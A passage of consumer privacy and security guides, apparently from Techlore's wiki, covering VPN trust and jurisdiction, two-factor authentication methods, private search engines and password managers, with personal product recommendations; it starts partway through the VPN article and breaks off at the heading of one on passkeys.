they do almost always deserve further inspection. #### On Ownership and Consolidation The VPN industry has significant consolidation. [Kape Technologies](https://en.wikipedia.org/wiki/Kape%5FTechnologies) acquired CyberGhost in 2017, Private Internet Access in 2019, and [ExpressVPN in 2021](https://www.techradar.com/news/expressvpn-to-join-kape-in-largest-deal-ever-in-vpn-industry). The reality is a large chunk of the VPN industry is controlled by a few companies, with independent providers becoming harder to find. It's always worth knowing who ultimately owns a VPN provider as part of your trust evaluation. Users who prefer independent, single-purpose providers with no corporate lineage concerns have legitimate reasons to consider that. #### Jurisdiction, the 5/9/14 Eyes, and What Actually Matters The **Five Eyes** (US, UK, Canada, Australia, New Zealand), **Nine Eyes** (adds France, Netherlands, Norway, Denmark), and **Fourteen Eyes** (adds Germany, Belgium, Italy, Spain, Sweden) are intelligence-sharing alliances that can compel companies in member countries to produce user data. This is real, but often overstated in VPN marketing. The nuance that matters: a no-logs VPN in a Five Eyes country has nothing to hand over. A dishonest provider in a non-14 eyes country can still log and produce your data if compelled or motivated. What's a *lot* more important are: - *Specific Provider jurisdiction*: where the company is legally based, and which laws govern compelled disclosure. - *Server location*: where the physical server you connect through actually sits. A provider based in Iceland can run servers in the US. Legal obligations apply to the company, not to every country it operates servers in. For most threat models, a verified no-logs policy from a reputable independent provider matters far more than whether their HQ is inside or outside an Eyes country. If your threat model involves a well-resourced state adversary, Tor is a more appropriate tool anyway. #### Multi-Hop VPNs and Two-Party Relays A multi-hop VPN routes your traffic through two or more servers instead of one. Your ISP sees you connect to server A, the destination sees server B's IP, and neither end can see the full picture. Most major providers offer this as a feature. The tradeoff is speed: double routing adds latency. There's an important distinction that most multi-hop marketing glosses over: **same-company multi-hop** and **two-party relays** are not the same thing. If both hops are operated by the same company, that company still has access to both ends of your connection. So the privacy improvement over single-hop is modest. A true **two-party relay** uses two independent organizations...one sees who you are but not where you're going, the other sees where you're going but not who you are. Neither alone can link your identity to your destination. Two services worth knowing about that use this model: - [**Apple iCloud Private Relay**](https://support.apple.com/en-us/102602): Apple operates the first hop (knows your IP, not your destination) and a third-party CDN (Akamai, Fastly, or Cloudflare) operates the second (knows the destination, not your IP). Significant caveat: it only covers Safari on Apple devices and doesn't route all system traffic. - [**Obscura VPN**](https://obscuravpn.io): a full-system VPN using Obscura as the first hop and [Mullvad](https://mullvad.net) as the second. Designed so that Obscura knows who you are but not where you're going, and Mullvad knows the destination but not who you are. Unlike Private Relay, it covers all traffic on the device, not just the browser. #### Decentralized VPNs (dVPNs) Decentralized VPNs use peer-to-peer networks of independent nodes, often incentivized through cryptocurrency tokens rather than servers operated by a single company. The promise is that with no central entity, there's no central point to compel or subpoena. The theory is sound, but the current reality is more complicated. Most dVPN implementations default to a single-hop connection through one node, which means you're trusting whoever runs that node not to log your activity, essentially the same trust problem as a centralized VPN but with a less accountable operator. Exit node operators in peer-to-peer networks can observe unencrypted traffic, and vetting individual node operators isn't practical for most users. dVPNs are worth watching as the space matures, but aren't a clear upgrade over reputable centralized providers for most threat models right now, especially when Tor is a more reputable option for higher threat models. --- ## 🎯 Why It Matters In March 2018, an attacker breached a [NordVPN](https://nordvpn.com) server at a third-party data center in Finland through an insecure remote management system the data center had installed without NordVPN's knowledge. [TLS keys were obtained](https://nordvpn.com/blog/official-response-datacenter-breach/), potentially usable for a man-in-the-middle attack against users on that specific server. NordVPN learned about the breach in April 2019\. They disclosed it publicly in October 2019, a full eighteen months after the breach, six months after they found out. The technical damage was limited: the server held no user logs, and the stolen keys had expired. But the timeline is the real story. A company whose entire value proposition is "trust us with your internet traffic" chose to sit on a known security incident for a year and a half. NordVPN has taken a lot of steps to try and rectify this incident, but this is the central difficulty with VPNs as a category. Unlike a password manager or an encrypted messaging app, where the security properties are to some degree verifiable through code audits and architecture reviews, a VPN's most important property depends almost entirely on trusting a company. You can read their privacy policy. You can read their audit reports. But at the end of it, you're handing over a lot of trust. This is also why the threat model question matters more for VPNs than for almost any other tool in this wiki. A VPN is the right tool for ISP visibility, untrusted networks, hiding your IP online, and geo-restricted content. It's not the right tool for completely solving website tracking (cookies and fingerprinting are unaffected), genuine anonymity (that's Tor), or threats involving your VPN provider's own data. Knowing the difference makes it a useful layer rather than a false ceiling on what you think you're protected from. For current provider comparisons across objective criteria like audit status, jurisdiction, ownership, open-source status, protocol support—see [vpn.techlore.tech](https://vpn.techlore.tech), Techlore's dedicated VPN comparison tool. --- ## 💡 Common Misconceptions ### "A VPN makes you anonymous." A VPN shifts trust from your ISP to your VPN provider. The provider sees your real IP and where you're going. Strong providers don't log, and independent audits exist to back that up, but anonymity isn't what a VPN sells. If genuine anonymity is what you need, Tor is the right tool. ### "VPNs are useless." This is the opposite misconception that's gained ground in the last few years, often as pushback against overblown VPN marketing. It's also wrong. VPNs solve specific problems: ISP-level visibility, public-network exposure, IP-address linkage to your activity, geographic restriction. There isn't a convenient alternative for getting any of those benefits since Tor is too slow for everyday browsing, and "just trust HTTPS" doesn't cover the metadata or the IP question. ### "Free VPNs are just paid VPNs without the price tag." Operating a VPN costs real money. Standalone free VPNs that don't charge users typically pay the bills by selling user data, injecting ads, or even turning your devices into exit nodes for other people's traffic. The legitimate exception is the *free tier* of a reputable paid provider, which is a limited version of a verified product, not a separate revenue model built on your activity. ### "A VPN will tank my internet speed." It used to be a real complaint. In 2026, with modern protocols like WireGuard and well-provisioned servers, the speed cost on a reputable VPN can be quite small on a good connection. Picking a server geographically close to you helps. For ordinary browsing and most everyday use, the speed difference is rarely something you'd notice without measuring it. --- ## 🗣️ Henry's Take There are two common misconceptions about VPNs that pull in opposite directions. One is the "VPNs are anonymous" story most VPN marketing sells. The other is a counter-reaction that's emerged in some technical circles: that VPNs are essentially useless because HTTPS exists and most people don't need one. Like many things, the truth is somewhere in the middle. VPNs solve specific, real problems. They hide site visits from your ISP. They mask your IP from the sites you're visiting. They protect traffic on networks you don't control. They route around region locks. My position is that a VPN is a useful tool for the right job...not a security blanket and not snake oil. My actual personal setup is on the more elaborate end. I run [Tailscale](https://tailscale.com) for access to my home network and NAS from anywhere, and I use the Mullvad exit-node feature inside Tailscale so a single connection covers both remote access and my privacy needs. If I didn't have a NAS, I would just use a single, standard VPN connection. One genuinely underrated free option worth mentioning: [Orbot](https://orbot.app). It's technically a Tor proxy rather than a VPN, but on Android and iOS it can route all app traffic through the Tor network system-wide which functions as a free, decentralized alternative to a commercial VPN for situations where you don't have one set up. It's slower than a VPN, but there's no subscription, no provider to trust, and the traffic is distributed across Tor relays rather than a single company's infrastructure. It's covered in more depth in the Understanding Tor article. For most people, the most underused entry point is a *browser-based* VPN. System-wide VPN is more thorough, but it also breaks specific sites in ways that are hard to undo cleanly. A browser-based VPN lets you whitelist sites with one toggle when something doesn't work. If you're on Apple's ecosystem, [iCloud Private Relay](https://support.apple.com/en-us/102602) is right there for the cost of iCloud+, it's genuinely good and I wish Apple would ship it system-wide. If you're on Firefox, [the new built-in VPN](https://blog.mozilla.org/en/firefox/built-in-vpn/) (free, 50 GB per month) is one of the cleanest entry points I've seen. For paid providers, [**vpn.techlore.tech**](https://vpn.techlore.tech) is where I update data on various VPN providers. --- ## ✅ Henry's Picks For provider-by-provider comparisons across audit status, jurisdiction, ownership, and open-source status, [**vpn.techlore.tech**](https://vpn.techlore.tech) is Techlore's VPN comparison tool. **Reputable paid providers:** - [**Mullvad**](https://mullvad.net): Open-source apps, no email required (account is a generated number), accepts cash and Monero, regular independent audits. The benchmark for "collects as little about you as the technology allows." What I use. - [**Proton VPN**](https://protonvpn.com): Open-source apps across platforms, audited, with a usable free tier. - [**IVPN**](https://ivpn.net): Open-source apps, anonymous signup, regularly audited. Similar profile to Mullvad with a slightly different feature set. - [**AzireVPN**](https://www.azirevpn.com): Swedish-based, no-logs, WireGuard-first, and one of the few providers that runs its own bare-metal servers with RAM-only infrastructure. Smaller footprint than Mullvad but similar ethos. - [**Obscura VPN**](https://obscuravpn.io): A two-party relay VPN using Obscura and Mullvad as independent hops so no single entity can see both who you are and where you're going. Full-system coverage unlike Private Relay. **Browser-based options**: - [**Apple iCloud Private Relay**](https://support.apple.com/en-us/102602): If you're on Apple with iCloud+, turn it on. Safari-only. - [**Firefox built-in VPN**](https://blog.mozilla.org/en/firefox/built-in-vpn/): Free 50 GB/month built into Firefox 149+ as of March 2026. - [**Proton VPN browser extension**](https://protonvpn.com/support/browser-extension/), [**Windscribe**](https://windscribe.com), etc.: Useful when system-wide VPN breaks specific sites. Whitelist per-tab instead of toggling the whole tunnel. ### Two-Factor Authentication: Which 2FA Method Actually Protects You? URL: https://techlore.tech/two-factor-authentication-which-2fa-method-actually-protects-you/ Last updated: 2026-07-19T01:41:51.000Z ## 📖 The Basics ### What It Is Two-factor authentication—also called 2FA, multi-factor authentication, or MFA—is a login security method that requires a second verification step after your password. The logic is you're combining something you *know* (your password) with something you *have* (a device, a physical key) or something you *are* (biometrics). If an attacker steals or guesses your password, they still can't access your account without that second factor. It's one of the highest-impact security improvements most people can make. But 2FA is a category of methods with meaningfully different security properties, so let's discuss them! ### How It Works There are four core types of 2FA, ordered from generally weakest to strongest: #### SMS One-Time Codes, The Floor This is typically a six-digit code sent to your phone via text. This is still the most common form of 2FA, but there are two structural weaknesses: - **SIM swapping**: Where an attacker socially engineers your carrier into transferring your phone number to a SIM they control - **SS7 interception**: Where vulnerabilities in the decades-old telecom signaling protocol allow someone with access to carrier infrastructure to intercept SMS messages in transit. These are both still common threats with no signs of decline. Use SMS 2FA only where no better option exists, and treat it as a temporary measure to replace. #### Email One-Time Codes, A Genuine Step Up Some services send a one-time code to your email address instead of your phone. This sidesteps carrier infrastructure entirely, so SS7 attacks and SIM swaps are irrelevant. The security of this method is largely inherited from your email account, so if your email has a strong, unique password and strong 2FA protecting it, email OTP is a reasonable middle tier. The limitation is that it depends entirely on your email being accessible and secure. #### TOTP Authenticator Apps, Where Most People Land This is typically a dedicated app on your device(s) that generates a new six-digit code every 30 seconds. The code is generated locally on your device, so there's no internet required, with no dependency on your phone number or email provider. TOTP codes can theoretically be phished in a real-time relay attack, but for most people TOTP is a solid place to be since it's free, an open standard, works offline, and provides protection that meaningfully raises the cost of account compromise. #### Hardware Security Keys, The Ceiling for Security This is a physical device you plug in or tap (USB-A, USB-C, or NFC) to authenticate. Hardware keys use the [FIDO2/WebAuthn](https://fidoalliance.org/fido2/) standard and public-key cryptography to generate an authentication signature that's cryptographically bound to the specific website you're logging into. This means a hardware key physically cannot be used on a phishing site, even a good one, because the cryptographic check verifies the domain. This is the strongest practical protection available for account security today. What it looks like is a site asks you to tap your security key, you just plug it in and tap it and that's all it takes. The limitation is you need to purchase a security key...ideally two or more in case you lose one. And not all services support security keys. But they're actually a very convenient option that can be more efficient than TOTP when logging in. ### Choosing Apps and Planning for Recovery A good TOTP app is open source, generates codes locally, and lets you export your seeds. [**Ente Auth**](https://ente.io/auth/) & Proton Authenticator are strong cross-platform picks that are open source, offline-first, with optional E2EE sync. [**Aegis**](https://getaegis.app/) is the go-to for Android users who want full local control. [**2FAS**](https://2fas.com/) works well with a browser extension workflow. For hardware keys, [**YubiKey**](https://www.yubico.com/) is the most widely supported; open-source alternatives include [**Nitrokey**](https://www.nitrokey.com/) and [**OnlyKey**](https://onlykey.io/). Recovery is something to set up the same day you enable 2FA, not the day you need it. Three things cover almost every scenario: save the backup codes the service generates at enrollment (your password manager's secure notes works fine), enroll a second factor wherever the service allows it, and if you're using a cloud-synced authenticator make sure you can sign back into it on a new device. Never let account recovery depend on a single device you could lose. --- ## 🎯 Why It Matters In a [Veritasium video](https://youtu.be/wVyu7NB7W6Y), Derek Muller demonstrated SS7 vulnerabilities live using Linus Sebastian (from Linus Tech Tips) as a test subject. Starting with nothing but Linus's phone number, Derek intercepted his calls, read his text messages, and captured a one-time login code sent to his phone. No phishing email. No malware. No physical access to the device. Linus never received the intercepted messages, and he had no idea anything happened. That demonstration is why SMS sits at the bottom of the 2FA tier list. Any account protected only by an SMS code is protected by infrastructure that can be exploited without the account holder ever knowing. TOTP and hardware keys remove carrier infrastructure from the equation entirely, which is a big security boost. The threat model here scales naturally. An everyday user enabling TOTP on their email and banking accounts gets a dramatic improvement in account security against the most common attack vectors. A journalist or activist who faces targeted threats should treat hardware keys as essential. Your password is the first factor, 2FA is the second. Together, account compromise becomes a significantly harder problem for an attacker to solve. --- ## 💡 Common Misconceptions ### "I have a strong password so 2FA is overkill." Strong passwords are essential, but 2FA protects against other threats: credential reuse from a breach you didn't know about, real-time phishing, malware that captures a typed password, social engineering. The point of 2FA isn't that good passwords are bad, it's that even good passwords can fail you without a second layer of safety. ### "All 2FA is roughly the same." SMS sits at the bottom of the list because SIM swapping and [SS7 attacks](https://youtu.be/wVyu7NB7W6Y) bypass it without the account holder ever noticing. TOTP and hardware keys remove the carrier from the equation entirely. Hardware keys also remove phishing as a threat by design, because the cryptographic check verifies the domain you're actually on. These can result in massive shifts in real-world security. ### "Storing 2FA codes in my password manager defeats the purpose." It does, *if* an attacker breaks into your vault. For higher-value accounts like email, banking, or the password manager's own 2FA—keeping codes in a separate authenticator app can better preserve the second-factor guarantee. For lower-stakes accounts, keeping TOTP in the password manager is generally fine, and the autofill convenience genuinely helps adoption. The two approaches can coexist. ### "Authenticator apps will lock me into their ecosystem." Some do, and they shouldn't. TOTP is an open standard, so any authenticator app should let you export your seeds and move them somewhere else. Always pick a 2FA app that supports export. An authenticator that won't give you your seeds back is using an open standard against you. (Authy...) ### "Barely any services support security keys." This was true several years ago and is increasingly not. Google, Apple, Microsoft, GitHub, Coinbase, many banks, most major password managers, and a growing list of government services all support hardware keys today. Support isn't universal, but it's broad enough that a key is practically useful for people's highest-value accounts. ### "I only need one security key." One key is a single point of failure...lose it, damage it, or leave it at home and you're locked out. The standard recommendation is at least two: a primary you use daily and a backup stored somewhere secure like a safe or lockbox. Most services that support hardware keys let you enroll multiple, and enrolling a backup key the day you set up the first one takes a few minutes. Skipping this step is the most common way people end up locked out of accounts they care about. ### "Security keys are inconvenient to use." In practice, hardware keys are often *faster* than TOTP. There's no app to open, no code to read and type before it expires—you just tap or insert the key and you're in. If the key stays plugged into your computer, authentication is a single tap with no extra steps at all. The concern that a permanently plugged-in key is a security risk is mostly unfounded since the key only responds when a site initiates an authentication request. The only risk is physical theft of an unlocked machine with the key still in it. --- ## 🗣️ Henry's Take A lot of the standard advice is binary: either keep all 2FA codes in your password manager (convenient, but the manager becomes a single point of failure) or move every code to a dedicated authenticator app. The honest middle ground that works for many people is to keep the most important accounts like your email, bank, government login in a separate authenticator app, and keep everything else inside your password manager where autofill is fast and the trade-off is small. That captures most of the security benefit of a separate authenticator without turning 2FA into a burden. On hardware keys: I use them wherever they're supported. They're the only 2FA method that's resistant to phishing by design. For accounts where compromise is consequential, it's worth it. The reality is most people will have a blend of all 2FA methods. I use security keys, TOTP, Email OTP, and SMS 2FA. Many services still use SMS 2FA, and the goal is to shift the methods over time to gravitate towards the more secure ones. The principle I will not move on: the TOTP app you pick must let you export your seeds. TOTP is an open standard. Apps that refuse to export are using that open standard to trap users in a closed ecosystem, and they do it on purpose. Authy is my most-cited example, and my position is straightforward: I do not recommend it under any circumstances, and if you're currently in Authy, plan the migration now. It's annoying since every account needs to be re-enrolled in your new app (since Authy refuses to let people export their seeds!) but it's far better than discovering later when you have even more services to migrate. Pick an authenticator that respects the standard. --- ## ✅ Henry's Picks These are the apps and keys I've actually tested and/or use. **TOTP authenticator apps:** - [**Ente Auth**](https://ente.io/auth): Open source, works fully offline, optional E2EE cloud sync. - [**Proton Authenticator**](https://proton.me/authenticator): Open source, supports seed export, cross-platform sync via Proton account. Natural fit if you're already in the Proton ecosystem. - [**Aegis Authenticator**](https://getaegis.app): Open source, Android-only, fully local with no cloud. Best for users who want zero cloud exposure. - [**2FAS**](https://2fas.com): Open source, iOS + Android with an optional browser extension. Friendly starting point. **Hardware security keys:** - [**YubiKey**](https://www.yubico.com): Most widely supported across services. The 5 Series covers nearly every workflow. - [**Nitrokey**](https://www.nitrokey.com): Open hardware *and* open firmware. The right pick if FOSS-on-the-hardware itself matters to you. **Inside your password manager:** [Proton Pass](https://proton.me/pass), [Bitwarden](https://bitwarden.com), and [KeePassXC](https://keepassxc.org) all store TOTP seeds. **Avoid:** Authy. No seed export means migrating off is a hostage situation built on top of an open standard. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Private Search Engines: How to Search Without Being Tracked URL: https://techlore.tech/private-search-engines-how-to-search-without-being-tracked/ Last updated: 2026-07-19T01:40:29.000Z ## 📖 The Basics ### What It Is A private search engine is one that doesn't log your queries, doesn't build a behavioral profile tied to your identity, and doesn't sell your search history to advertisers. This is quite different from the business models of Google or Bing, who collect and profile your searches over time. Private search engines typically generate revenue through contextual ads shown against your query (not a profile built over months of tracking), subscription fees, or donations. "Private search engine" covers a range of architectures with meaningfully different privacy properties. Some run their own indexes. Some proxy results from Google or Bing while stripping your identity from the request. Some let you self-host. Understanding which type you're using matters for understanding what you're actually getting. ### How It Works #### Why Google's Search Model is a Problem When you search on Google, the query is logged and associated with your account or a persistent device identifier. That query joins a record of everything else you've searched today, this week, this year, for life. Google analyzes the pattern: what topics you return to, how your interests change over time, what you search immediately before and after certain events. This profile feeds into ad targeting across Google's entire network from Search, YouTube, Gmail, Maps, Gemini, and every site running Google Ads. The search box is one of the most intimate data collection points in your digital life, because people use it to look up things they haven't told anyone: health symptoms, financial worries, relationship problems, political questions, things they're embarrassed or afraid to ask a person. Google has access to all of it. A private search engine breaks this at the point of logging: if no query is recorded and no profile is built, there's nothing to monetize, nothing to subpoena, and nothing to breach. #### Types of Private Search Engines - *Independent index engines* crawl the web themselves and serve results from their own database, with no dependency on Google or Bing infrastructure. This is the hardest to build and the most trustworthy from an independence standpoint. [Brave Search](https://search.brave.com) is a popular search engine using its own index. - *Metasearch engines* aggregate results from one or multiple sources without passing your identity to those sources. Your query goes to the metasearch server, which queries upstream engines using its own IP, then returns combined results to you. The upstream engines see the metasearch server, not you. [DuckDuckGo](https://duckduckgo.com) and [Startpage](https://www.startpage.com) are common metasearch options—using Bing and Google respectively. - *Paid search engines* align incentives by charging users instead of selling their data. [**Kagi**](https://kagi.com) is the primary example. Since subscribers pay the bill, Kagi has no financial reason to log or monetize search behavior. #### The Tradeoff on Results Quality Private search engines generally produce good results for most queries. For highly specific, niche, or recency-sensitive searches like breaking news, obscure technical topics, or regional content—Google's index depth and query understanding can still sometimes produce better results. This gap has narrowed significantly as alternatives have matured, with some users even preferring the alternatives. Some people use a private engine as their default and fall back to Google through a private window for specific queries where results fall short, which is a reasonable and common compromise for most people. #### The Self-Hosted Option [**SearXNG**](https://docs.searxng.org) can be run on your own server, giving you an instance that aggregates from multiple upstream sources with no dependency on any third party's privacy promises. Queries go from your SearXNG instance to search engines, so those engines see only your server's IP. You control the configuration, the upstream sources, and the data. For users comfortable with self-hosting, this is the highest-control option available. Public SearXNG instances listed at [searx.space](https://searx.space) are a lower-friction alternative, though they require trusting whoever operates the instance. --- ## 🎯 Why It Matters The chilling effect of knowing your searches are logged is documented and real. An [MIT study by Marthews and Tucker](https://papers.ssrn.com/sol3/papers.cfm?abstract%5Fid=2412564) found a roughly 2.2 percentage point drop in searches for sensitive terms following the Snowden/PRISM revelations, the first empirical evidence that awareness of government surveillance directly changes what people are willing to search. A [separate study by Jon Penney](http://btlj.org/data/articles2016/vol31/31%5F1/0117%5F0182%5FPenney%5FChillingEffects%5FWEB.pdf) found that Wikipedia traffic to privacy-sensitive articles dropped by approximately 20% after the same revelations, with effects that appeared to be long-lasting rather than temporary. A [2025 longitudinal experiment](https://academic.oup.com/joc/advance-article/doi/10.1093/joc/jqag004/8667253) published in the Journal of Communication provided causal evidence: exposure to dataveillance directly reduced participants' comfort with searching for information online. And a [cross-national survey](https://policyreview.info/articles/analysis/internet-surveillance-regulation-and-chilling-effects-online-comparative-case) found that 78% of respondents said knowing the government monitored online activity would make them more careful about what they search for. The search box stops being a place you can think freely when it becomes a surveillance record. Switching a search engine is one of the lowest-friction privacy improvements available. It takes less than a minute to change a default browser search engine, and the day-to-day experience of searching is largely unchanged for most queries. The gap between what Google knows about you from search and what a private engine accumulates compounds over every search you make going forward. --- ## 💡 Common Misconceptions ### "It's all or nothing. If I switch, I lose Google's results for the queries that really need them." It's not all or nothing. Most recommended engines on this page support *bangs*: short prefixes that let you redirect a single query elsewhere. Type `!g best restaurants near me` in DuckDuckGo or Brave Search and the query runs on Google. Type `!yt` for YouTube, `!w` for Wikipedia, `!amz` for Amazon. You can change your default to a private engine today and still drop into Google for the queries where it genuinely matters, without changing browsers or windows. And search engines like Startpage privately proxy Google results. ### "Unless I'm self-hosting SearXNG, I'm not really getting privacy." This frames the choice as a binary that doesn't reflect reality. If you're not self-hosting, you're picking *which* provider sees your queries. Which would you rather have see your queries: Google's profile-building advertising business, or a smaller provider with a different model and no comparable incentive to log and monetize you? That shift is meaningful even when it doesn't reach the ceiling self-hosting offers. ### "Switching means worse results across the board." For common queries like recipes, definitions, and basic searches, the gap has effectively closed. Where Google can still win is breaking news, very recent or regional content, and highly obscure technical questions. The combination of a private default and bangs handles both cases without forcing a permanent choice. --- ## 🗣️ Henry's Take What I think matters more than picking the perfect engine is making the switch at all. People commonly get stuck on details, but picking *any* privacy-focused provider, then configuring bangs so you don't paint yourself into a corner will deliver a majority of benefits. Brave Search is what I use day to day, it runs its own index, doesn't depend on Bing or Google for results, and the experience is close enough to Google that the switch is invisible after a week. DuckDuckGo is also a great default on iOS, where it's a native option in Safari, and it remains a strong baseline option anywhere. Kagi is the option to look at if you're willing to pay for search and want the incentives aligned all the way down. Play around with some search engines, see what gives you the results you like, and switch to a new default and enjoy the privacy benefits! --- ## ✅ Henry's Picks [**Brave Search**](https://search.brave.com): my day-to-day default. Independent index, no dependence on Google or Bing, supports bangs, and the result quality is close enough to Google that the migration is painless. Free, no account required. [**DuckDuckGo**](https://duckduckgo.com): the strongest default on iOS, where Safari only allows a short list of engines. A solid baseline anywhere. Metasearch architecture (primarily Bing-backed for web results) with no profile tied to your queries. [**Startpage**](https://www.startpage.com): proxies Google results privately. You get Google's index and query understanding without Google seeing your IP or identity. The right pick if result quality from Google's index is the priority and you don't want to hand Google any data directly. [**Kagi**](https://kagi.com): Paid search. Worth looking at if you want incentives aligned all the way down: you're the customer, not the product. Strong result quality, customizable result ranking, and built-in tools for blocking or down-ranking sites you don't want to see again. [**SearXNG**](https://docs.searxng.org): for users comfortable with self-hosting. A metasearch frontend you run yourself, aggregating results from upstream engines that see only your server's IP. The highest-control option available. Public instances at [searx.space](https://searx.space) are a lower-friction alternative if you're willing to trust the operator. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Password Managers: How They Work and Why You Probably Need One URL: https://techlore.tech/password-managers-how-they-work-and-why-you-pneed-one/ Last updated: 2026-07-19T01:38:59.000Z ## 📖 The Basics ### What It Is A password manager is software that generates strong, unique passwords for every account you have and stores them in an encrypted vault. You remember one thing, typically your master password, and the manager handles every credential for every service you use. Most include browser extensions that autofill your credentials automatically when you visit a site, and mobile apps that do the same on your phone. The vault is encrypted on your device before anything is synced anywhere. With reputable managers using a zero-knowledge architecture, the company's servers hold only encrypted data they cannot read. ### How It Works **The core problem password managers solve** isn't laziness. It's math. An 8-character password, even with numbers and symbols, can be cracked by modern hardware in hours. A 16-character random password takes thousands of years with current tech. But the reality is no human can memorize a unique 16-character random string for every account they have. The rational response to this situation has been password reuse, where people use the same passwords everywhere, but this is one of the most dangerous things you can do online. That's because of **credential stuffing**: when attackers take credentials from one breach and automatically try them against thousands of other services. If you reused that password on your bank, your email, your work accounts, one breach cascades into total exposure. A password manager breaks the cycle. Every account gets a different, randomly generated password. A breach with one service exposes only one credential, which is useless anywhere else. This keeps data breaches well-contained. #### How Your Vault is Protected With most services, your vault is encrypted using your master password—more specifically a derived version of it. The manager runs your master password through a key derivation function (modern standards use [Argon2id](https://en.wikipedia.org/wiki/Argon2)) that's deliberately slow and computationally expensive, making brute-force attacks on a stolen vault significantly harder. The vault is encrypted before it ever leaves your device, so a proper zero-knowledge provider can't access your passwords. This is why the strength of your master password matters. It should be long, random, and used nowhere else. #### Cloud Sync vs. Local-Only Most mainstream password managers sync your vault via their servers. These are convenient, automatic between your devices, and still secure if the zero-knowledge architecture is implemented correctly. The encrypted vault on their servers is useless without your master password. But for people who don't want any cloud involvement, local-only managers store your vault as a file that lives entirely on your devices. You control where it lives and how it's backed up. The tradeoff is that syncing across devices becomes a process you manage yourself, but for users who want full control it's a solid option. I'll cover tips for local syncing later in this article. #### Browser Extensions and Autofill A browser extension is what helps make a password manager practical. When you visit a site, the extension detects the login form and fills your credentials, or prompts you to save new credentials when you create an account. The extension also serves as a phishing defense since it matches credentials to the exact domain they were saved for. If you're on a fake site impersonating your bank, the extension won't autofill, because the domain doesn't match. #### Other Tools Password Managers Can Offer Password managers have slowly become full security solutions with more than just basic password management, including features like: - Breach monitoring alerts you when an account's credentials appear in known data breaches. - Emergency access features let a designated trusted person request vault access after a waiting period you define, useful for estate planning or family emergencies. - Secure notes let you store recovery codes, license keys, or other text that needs to be protected but doesn't fit the username-password format. - Email aliasing allows you to automatically generate unique emails that forward to your regular email inbox for every account. Some people want their password manager to be a focused piece of software, but others enjoy the extra usability provided. #### What If I Forget My Master Password? This question comes up a lot, and the answer is the same across every reputable zero-knowledge service: if you forget your master password, the provider cannot recover it for you. That's the whole point of zero-knowledge encryption, the company doesn't have a copy. Some managers offer optional recovery mechanisms (emergency access by a trusted contact, biometric unlock on a logged-in device, account recovery via a printed code), but none of them work by giving the provider a backdoor to your vault. The practical implication is you need to assume you'll forget it. When you first create the master password, write it down on physical paper and store it somewhere secure like a safe, a sealed envelope with important documents, etc. Most managers also generate a "recovery key" or "emergency kit" during setup. Print it and store it the same way. Take it seriously the day you set it up; you'll be relieved you did the day you need it. --- ## 🎯 Why It Matters In December 2022, [LastPass disclosed](https://blog.lastpass.com/posts/notice-of-recent-security-incident) that attackers had stolen encrypted copies of its users' password vaults. The [breach happened in stages](https://en.wikipedia.org/wiki/2022%5FLastPass%5Fdata%5Fbreach): attackers first compromised a developer's laptop. After some movement, they were later able to access the company's encrypted cloud backups from every user's vault. By early 2026, blockchain investigators had traced at least $35 million in cryptocurrency thefts to brute-force attacks on those stolen vaults. This story isn't an argument against password managers. It's an argument for understanding what makes one trustworthy. LastPass's failures were specific: poor internal security hygiene, unencrypted metadata in vaults (website URLs, email addresses, and company names were all exposed in plaintext), and inadequate separation between developer environments and production secrets. Better-designed services handle each of these differently. Open-source code that can be independently inspected, regular third-party audits, and zero-knowledge architectures where even the provider can't read vault contents are meaningful distinctions. The best password manager is the secure one you'll actually use consistently on all your devices. Picking one, migrating your most important accounts first, everything else over time, then enabling 2FA on the vault itself covers the majority of meaningful improvement for most people. From there, you can evolve your security to add all remaining services, introduce more secure passwords for each one, add stronger 2FA, passkeys, and more! --- ## 💡 Common Misconceptions ### "Cloud-synced password managers aren't safe." While keeping it strictly offline is generally the *safest* option, a well-implemented cloud manager uses zero-knowledge encryption, so your vault is encrypted on your device before it reaches their servers. For most threat models, the convenience of easy sync across devices is worth more than the marginal additional risk surface. Don't let "should it be local-only?" debates keep you from starting at all. ### "Browser extensions are too risky to use." Extensions do add attack surface. They also provide one of the strongest anti-phishing signals available to a normal user since the extension won't autofill on a domain it didn't save credentials for. For many people, that anti-phishing benefit outweighs the extra surface, but higher-risk threat models can use a manager without the extension and copy/paste manually. ### "If I can't use the 'best' option, I should use nothing." Any password manager that generates unique, strong passwords for every account is dramatically better than reusing the same few passwords across the internet. Apple Passwords, Google's built-in manager, and Firefox's built-in manager are all valid starting points if you're not yet using anything. Get on *something*. Upgrade later. ### "Picking a manager locks me in forever." Every reputable, open-source password manager has a proper export and import. Migration is a real-but-small project. Pick something, start using it, and switch later if you outgrow it. The decision is reversible. ### "What about 2FA and passkeys?" Password managers are one piece of a broader account security picture. Two-factor authentication and passkeys are closely related topics worth understanding alongside them. See the Two-Factor Authentication and Passkeys articles for more. --- ## 🗣️ Henry's Take The most important thing I can share about password managers is also the most boring one: **any password manager is almost always better than no password manager.** I've seen people spend weeks comparing audit dates, key derivation functions, and architecture diagrams—while still logging into twenty sites with the same password they made up in college. *That's* the actual emergency. The gap between no manager and any reputable manager generating strong unique passwords is enormous. The gap between two reputable managers is comparatively small. I use [Proton Pass](https://proton.me/pass), the sync works consistently across every OS, I love the UI, and the SimpleLogin integration handles my aliasing in the same place. I migrated from KeePass, which I also loved, but managing a database file across machines was always a small amount of friction that eventually wore me down. If you're a KeePass user who wants to stick with it, clients that sync natively via a mainstream cloud provider work well (the vault is encrypted, so the cloud provider doesn't need to be trusted), or you can keep it fully offline and sync with Syncthing. The advice I'd give a family member at dinner: pick anything that generates strong, unique passwords for every account. Apple Passwords if you're in the Apple ecosystem, Bitwarden if you're cross-platform, a notebook if you're old-school. Strong and unique is what matters for most people. --- ## ✅ Henry's Picks These are managers I've actually used and migrated between. - [**Proton Pass**](https://proton.me/pass): What I use. Zero-knowledge architecture, open-source apps, consistent cross-platform sync, and integrated email aliasing. - [**Bitwarden**](https://bitwarden.com): Open source, audited regularly, generous free tier. The safe default if you want the most widely supported recommendation and aren't already in a specific ecosystem. - **KeePass** (with optional [Syncthing](https://syncthing.net) for sync): Local-only, no servers, no business model. Best fit if you want full infrastructure control and don't mind each client on each OS having its own quirks. - **Apple Passwords** (built into iOS/macOS): A valid starting point for anyone deep in the Apple ecosystem who would otherwise not use a manager at all. Generates strong passwords, syncs through iCloud Keychain, and is everywhere on your devices. For higher-risk threat models that want a separate authenticator for 2FA, see the Two-Factor Authentication article. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### What Are Passkeys and How Do They Replace 